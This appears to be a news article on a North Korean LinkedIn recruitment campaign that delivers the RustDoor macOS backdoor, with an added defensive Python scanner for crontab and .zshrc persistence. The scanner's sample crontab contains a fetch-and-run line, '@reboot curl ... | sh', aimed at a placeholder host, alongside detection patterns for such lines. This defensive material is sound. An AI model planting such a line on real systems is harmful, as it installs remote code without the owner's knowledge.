Cybersecurity researchers have issued warnings about North Korean threat actors using LinkedIn to deliver malware, specifically RustDoor, to unsuspecting victims. The latest alert comes from Jamf Threat Labs, which uncovered an attack where a LinkedIn user was contacted by someone posing as a recruiter for STON.fi, a legitimate decentralized cryptocurrency exchange (DEX).
This activity is part of a larger, coordinated campaign by state-backed hackers from the Democratic People’s Republic of Korea (DPRK). These hackers aim to infiltrate the networks of organizations, often under the guise of conducting interviews or technical assessments. Their primary targets are the financial and cryptocurrency sectors, which North Korean actors exploit to generate illicit revenue and achieve regime-driven objectives.
The attackers employ sophisticated, hard-to-detect social engineering techniques. These campaigns, particularly those aimed at employees of decentralized finance (DeFi) and cryptocurrency firms, have been noted in recent advisories from the U.S. Federal Bureau of Investigation (FBI). One typical tactic is to ask victims to run code or download applications on devices that have access to internal company networks.
In many cases, attackers ask targets to complete "pre-employment tests" or debugging tasks involving non-standard or suspicious Node.js or PyPI packages, scripts, or GitHub repositories. Recent documentation shows that such attacks have been evolving, using increasingly advanced tools.
The latest attack identified by Jamf involved tricking a victim into downloading a booby-trapped Visual Studio project disguised as part of a coding challenge. The project embeds bash commands that download two second-stage payloads, "VisualStudioHelper" and "zsh_env," which have identical functionality. Both malware samples—collectively known as RustDoor (tracked by Jamf as Thiefbucket)—are designed to persist on the victim’s machine, each through a different method.
The malicious code attempts to maintain persistence through cron jobs for VisualStudioHelper, while zsh_env does so via the zshrc file. RustDoor, a macOS backdoor first detected by Bitdefender in February 2024, has now been formally linked to North Korean hackers for the first time by Jamf. It has also been identified in a Golang variant, known as GateDoor, which is used to target Windows systems.
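Both persistence methods described above leave an entry in a plain-text file that a defender can inspect: the user's crontab and the shell startup file ~/.zshrc. The following script is an added example (not part of the Jamf report and not code from the malware) that scans both kinds of file for lines a responder would want to look at. The crontab and .zshrc contents are constructed samples; the two payload names come from the report, while the "hidden directory" and "pipe-to-shell" patterns are this example's own heuristics, and the URL in the sample is a placeholder.

```python
import re
from typing import Dict, List

# Constructed sample of a user crontab (as printed by `crontab -l`); not real data.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * /usr/bin/true
*/5 * * * * /Users/dev/Library/Application Support/VisualStudioHelper/VisualStudioHelper
@reboot curl -s http://placeholder.invalid/stage | sh
"""

# Constructed sample of a ~/.zshrc; the last line models a hypothetical
# persistence entry that launches a hidden binary on every interactive shell start.
SAMPLE_ZSHRC = """\
export PATH=$HOME/bin:$PATH
alias ll='ls -la'
# harmless comment
/Users/dev/.config/zsh_env &
"""

# Indicators: the two payload names from the report, plus two generic heuristics
# (the generic ones are this example's own assumption about what is worth flagging).
INDICATORS = {
    "known payload name (VisualStudioHelper)": re.compile(r"VisualStudioHelper"),
    "known payload name (zsh_env)": re.compile(r"zsh_env"),
    "command path inside a hidden directory": re.compile(r"/\.[^/\s]+/"),
    "download piped into a shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
}


def _match(command: str) -> List[str]:
    """Return the names of every indicator that matches the command text."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def _split_cron_entry(entry: str) -> str:
    """Strip the schedule from a crontab line and return only the command part.

    Handles both the five-field form ('*/5 * * * * cmd') and the '@reboot cmd' form.
    """
    fields = entry.split(None, 1) if entry.startswith("@") else entry.split(None, 5)
    return fields[-1] if len(fields) > 1 else ""


def scan_crontab(text: str) -> List[Dict]:
    """Scan crontab text; report each non-comment entry whose command matches an indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        command = _split_cron_entry(line)
        reasons = _match(command)
        if reasons:
            findings.append({"line": lineno, "command": command, "reasons": reasons})
    return findings


def scan_zshrc(text: str) -> List[Dict]:
    """Scan shell startup text; every non-comment line is treated as a command."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = _match(line)
        if reasons:
            findings.append({"line": lineno, "command": line, "reasons": reasons})
    return findings


def format_findings(label: str, findings: List[Dict]) -> str:
    """Render findings as one report line per hit, for a ticket or console."""
    if not findings:
        return f"{label}: no suspicious entries"
    rows = [f"{label}: line {f['line']}: {f['command']}  [{'; '.join(f['reasons'])}]"
            for f in findings]
    return "\n".join(rows)


if __name__ == "__main__":
    print(format_findings("crontab", scan_crontab(SAMPLE_CRONTAB)))
    print(format_findings("~/.zshrc", scan_zshrc(SAMPLE_ZSHRC)))
```

On a live host the same functions can be fed the output of `crontab -l` and the contents of ~/.zshrc (and ~/.zprofile, ~/.zshenv, which the shell also sources). Name-based indicators only catch this particular campaign; the two generic heuristics are what keep the check useful once the payloads are renamed.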
The malware is notable for being written in Objective-C and acts as both a backdoor and an information stealer. VisualStudioHelper attempts to harvest specified files from the victim's system, prompting the user for their system password with a dialog that mimics a request from the Visual Studio app so as not to arouse suspicion.
Both payloads establish command-and-control (C2) communications with two different servers, allowing the attackers to control infected devices remotely.
Jamf’s discovery is significant not only because it attributes RustDoor to North Korean actors but also because it shows how the sophistication of these attacks continues to evolve. The researchers stressed the importance of training employees, particularly developers, to be cautious of unsolicited contacts on social media, especially when asked to run or download unfamiliar software.
“Threat actors are continually adapting to find new ways to target the cryptocurrency industry,” researchers Jaron Bradley and Ferdous Saljooki said. “It's crucial to ensure employees remain skeptical of those who reach out via social media and ask them to execute software of any kind. These DPRK social engineering campaigns are led by actors fluent in English and are well-researched on their targets.”